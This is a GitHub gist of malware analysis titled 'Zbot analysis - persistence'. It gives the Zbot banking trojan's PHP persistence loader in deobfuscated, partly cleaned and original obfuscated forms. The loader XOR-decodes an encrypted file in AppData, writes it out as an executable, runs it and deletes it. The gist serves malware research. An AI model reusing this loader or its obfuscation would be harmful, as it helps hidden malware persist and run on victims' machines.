Create a gist now

Instantly share code, notes, and snippets.

@hasherezade /deobfuscated.php Secret
Last active Jan 10, 2017

What would you like to do?
Zbot analysis - persistence
<?php
function _get_arr_value($index)
{
$fcfeek = Array(
"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20", //0
"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c", //1
'qsgfh',//2
'ojetjlsjqbudwfx', //3
'oktwz',//4
'ekuwdqoqcadeetv', //5
'nxz', //6
''//7
);
return $fcfeek[$index];
}
?>
<?php
$key = -1388517416;
$erywquk = 3383;
$in_filename = _get_arr_value(0);
$out_filename = _get_arr_value(1);
$in_filename = decode($in_filename, $key);
#$in_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh"
$golkdbl = _get_arr_value(2);
$out_filename = decode($out_filename, $key);
$file_content = file_get_contents($in_filename);
#out_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh.exe"
if ($file_content) {
$decoded_content = decode($file_content, $key);
file_put_contents($out_filename, $decoded_content);
exec($out_filename);
while (!unlink($out_filename))
Sleep(1);
}
function shift_decode($val, $and_val)
{
$k = $and_val & 31;
return ($val << $k) | (($val >> (32 - $k)) & ((1 << (31 & $k)) - 1));
}
function decode($in_buffer, $key)
{
$out_buffer = '';
$input_len = strlen($in_buffer);
for ($index = 0; $index < $input_len; ++$index) {
$decoded_char = chr(ord($in_buffer{$index}) ^ ($key & 0xFF));
$out_buffer .= $decoded_char;
$key = shift_decode($key, 8);
++$key;
}
return $out_buffer;
}
?>
<?php
$GLOBALS['529399110'] = Array(
'' . 'abs',
'f' . 'ile' . '_' . 'ge' . 't' . '_c' . 'o' . 'ntents',
'file_put' . '_content' . 's',
'exec',
'strpos',
'' . 'so' . 'cke' . 't_get_sta' . 't' . 'us',
'un' . 'link',
'ar' . 'ray_m' . 'erge',
'strpos',
'im' . 'agefilter',
'a' . 'rray_sh' . 'ift',
's' . 't' . 'rpti' . 'me',
'strl' . 'e' . 'n',
'u' . 'c' . 'f' . 'irst',
'' . 'ch' . 'r',
'ord',
's' . 'ubs' . 't' . 'r' . '_re' . 'place',
'su' . 'bstr_re' . 'p' . 'lac' . 'e',
'copy',
'un' . 'l' . 'ink'
);
?><?php
function _2136181597($fcvppx)
{
$fcfeek = Array(
"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20",
"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c",
'qsgfh',
'ojetjlsjqbudwfx',
'oktwz',
'ekuwdqoqcadeetv',
'nxz',
''
);
return $fcfeek[$fcvppx];
}
?>
<?php
$tmgwczl = -round(0 + 277703483.2 + 277703483.2 + 277703483.2 + 277703483.2 + 277703483.2);
$erywquk = round(0 + 845.75 + 845.75 + 845.75 + 845.75);
$pvkdnon = _2136181597(0);
while (round(0 + 278 + 278 + 278 + 278) - round(0 + 278 + 278 + 278 + 278))
$GLOBALS['529399110'][0]($ehzfpai);
$zzmnlgm = _2136181597(1);
$pvkdnon = girsztc($pvkdnon, $tmgwczl);
$golkdbl = _2136181597(2);
$zzmnlgm = girsztc($zzmnlgm, $tmgwczl);
$dtpcqwi = $GLOBALS['529399110'][1]($pvkdnon);
if ($dtpcqwi) {
$mauwmmh = girsztc($dtpcqwi, $tmgwczl);
$GLOBALS['529399110'][2]($zzmnlgm, $mauwmmh);
$GLOBALS['529399110'][3]($zzmnlgm);
if ($GLOBALS['529399110'][4](_2136181597(3), _2136181597(4)) !== false)
$GLOBALS['529399110'][5]($opberbw, $zzmnlgm);
while (!$GLOBALS['529399110'][6]($zzmnlgm))
Sleep(round(0 + 0.5 + 0.5));
}
function vsqaxzw($ujxlctg, $cuvcjeb)
{
$jedmsae = $cuvcjeb & round(0 + 7.75 + 7.75 + 7.75 + 7.75);
while (round(0 + 4457) - round(0 + 1114.25 + 1114.25 + 1114.25 + 1114.25))
$GLOBALS['529399110'][7]($cuvcjeb, $ujxlctg, $dtpcqwi, $mauwmmh);
return ($ujxlctg << $jedmsae) | (($ujxlctg >> (round(0 + 16 + 16) - $jedmsae)) & ((round(0 + 0.5 + 0.5) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $jedmsae)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)));
if ($GLOBALS['529399110'][8](_2136181597(5), _2136181597(6)) !== false)
$GLOBALS['529399110'][9]($opberbw);
}
function girsztc($ehzfpai, $tmgwczl)
{
$fnbzhld = _2136181597(7);
if ((round(0 + 1.6666666666667 + 1.6666666666667 + 1.6666666666667) + round(0 + 405.75 + 405.75 + 405.75 + 405.75)) > round(0 + 1.25 + 1.25 + 1.25 + 1.25) || $GLOBALS['529399110'][10]($zzmnlgm));
else {
$GLOBALS['529399110'][11]($ehzfpai, $pvkdnon, $abwytbw);
}
$abwytbw = $GLOBALS['529399110'][12]($ehzfpai);
while (round(0 + 15 + 15 + 15 + 15 + 15) - round(0 + 25 + 25 + 25))
$GLOBALS['529399110'][13]($pvkdnon, $mauwmmh);
for ($opberbw = round(0); $opberbw < $abwytbw; ++$opberbw) {
$xqnsess = $GLOBALS['529399110'][14]($GLOBALS['529399110'][15]($ehzfpai{$opberbw}) ^ ($tmgwczl & round(0 + 85 + 85 + 85)));
if ((round(0 + 366 + 366 + 366 + 366 + 366) ^ round(0 + 610 + 610 + 610)) && $GLOBALS['529399110'][16]($tmgwczl, $mauwmmh, $ehzfpai))
$GLOBALS['529399110'][17]($xqnsess, $ujxlctg);
$fnbzhld .= $xqnsess;
if ((round(0 + 552 + 552 + 552) ^ round(0 + 1656)) && $GLOBALS['529399110'][18]($jedmsae, $opberbw))
$GLOBALS['529399110'][19]($pvkdnon, $fnbzhld, $opberbw);
$tmgwczl = vsqaxzw($tmgwczl, round(0 + 4 + 4));
++$tmgwczl;
}
return $fnbzhld;
}
?>
<?php $GLOBALS['529399110']=Array('' .'abs','f' .'ile' .'_' .'ge' .'t' .'_c' .'o' .'ntents','file_put' .'_content' .'s','exec','strpos','' .'so' .'cke' .'t_get_sta' .'t' .'us','un' .'link','ar' .'ray_m' .'erge','strpos','im' .'agefilter','a' .'rray_sh' .'ift','s' .'t' .'rpti' .'me','strl' .'e' .'n','u' .'c' .'f' .'irst','' .'ch' .'r','ord','s' .'ubs' .'t' .'r' .'_re' .'place','su' .'bstr_re' .'p' .'lac' .'e','copy','un' .'l' .'ink'); ?><?php function _2136181597($fcvppx){$fcfeek=Array("\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20","\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c",'qsgfh','ojetjlsjqbudwfx','oktwz','ekuwdqoqcadeetv','nxz','');return $fcfeek[$fcvppx];} ?><?php $tmgwczl=-round(0+277703483.2+277703483.2+277703483.2+277703483.2+277703483.2);$erywquk=round(0+845.75+845.75+845.75+845.75);$pvkdnon=_2136181597(0);while(round(0+278+278+278+278)-round(0+278+278+278+278))$GLOBALS['529399110'][0]($ehzfpai);$zzmnlgm=_2136181597(1);$pvkdnon=girsztc($pvkdnon,$tmgwczl);$golkdbl=_2136181597(2);$zzmnlgm=girsztc($zzmnlgm,$tmgwczl);$dtpcqwi=$GLOBALS['529399110'][1]($pvkdnon);if($dtpcqwi){$mauwmmh=girsztc($dtpcqwi,$tmgwczl);$GLOBALS['529399110'][2]($zzmnlgm,$mauwmmh);$GLOBALS['529399110'][3]($zzmnlgm);if($GLOBALS['529399110'][4](_2136181597(3),_2136181597(4))!==false)$GLOBALS['529399110'][5]($opberbw,$zzmnlgm);while(!$GLOBALS['529399110'][6]($zzmnlgm))Sleep(round(0+0.5+0.5));}function vsqaxzw($ujxlctg,$cuvcjeb){$jedmsae=$cuvcjeb&round(0+7.75+7.75+7.75+7.75);while(round(0+4457)-round(0+1114.25+1114.25+1114.25+1114.25))$GLOBALS['529399110'][7]($cuvcjeb,$ujxlctg,$dtpcqwi,$mauwmmh);return($ujxlctg << $jedmsae)|(($ujxlctg >>(round(0+16+16)-$jedmsae))&((round(0+0.5+0.5)<<(round(0+7.75+7.75+7.75+7.75)&$jedmsae))-round(0+0.2+0.2+0.2+0.2+0.2)));if($GLOBALS['529399110'][8](_2136181597(5),_2136181597(6))!==false)$GLOBALS['529399110'][9]($opberbw);}function girsztc($ehzfpai,$tmgwczl){$fnbzhld=_2136181597(7);if((round(0+1.6666666666667+1.6666666666667+1.6666666666667)+round(0+405.75+405.75+405.75+405.75))>round(0+1.25+1.25+1.25+1.25)|| $GLOBALS['529399110'][10]($zzmnlgm));else{$GLOBALS['529399110'][11]($ehzfpai,$pvkdnon,$abwytbw);}$abwytbw=$GLOBALS['529399110'][12]($ehzfpai);while(round(0+15+15+15+15+15)-round(0+25+25+25))$GLOBALS['529399110'][13]($pvkdnon,$mauwmmh);for($opberbw=round(0);$opberbw<$abwytbw;++$opberbw){$xqnsess=$GLOBALS['529399110'][14]($GLOBALS['529399110'][15]($ehzfpai{$opberbw})^($tmgwczl&round(0+85+85+85)));if((round(0+366+366+366+366+366)^round(0+610+610+610))&& $GLOBALS['529399110'][16]($tmgwczl,$mauwmmh,$ehzfpai))$GLOBALS['529399110'][17]($xqnsess,$ujxlctg);$fnbzhld .= $xqnsess;if((round(0+552+552+552)^round(0+1656))&& $GLOBALS['529399110'][18]($jedmsae,$opberbw))$GLOBALS['529399110'][19]($pvkdnon,$fnbzhld,$opberbw);$tmgwczl=vsqaxzw($tmgwczl,round(0+4+4));++$tmgwczl;}return $fnbzhld;} ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment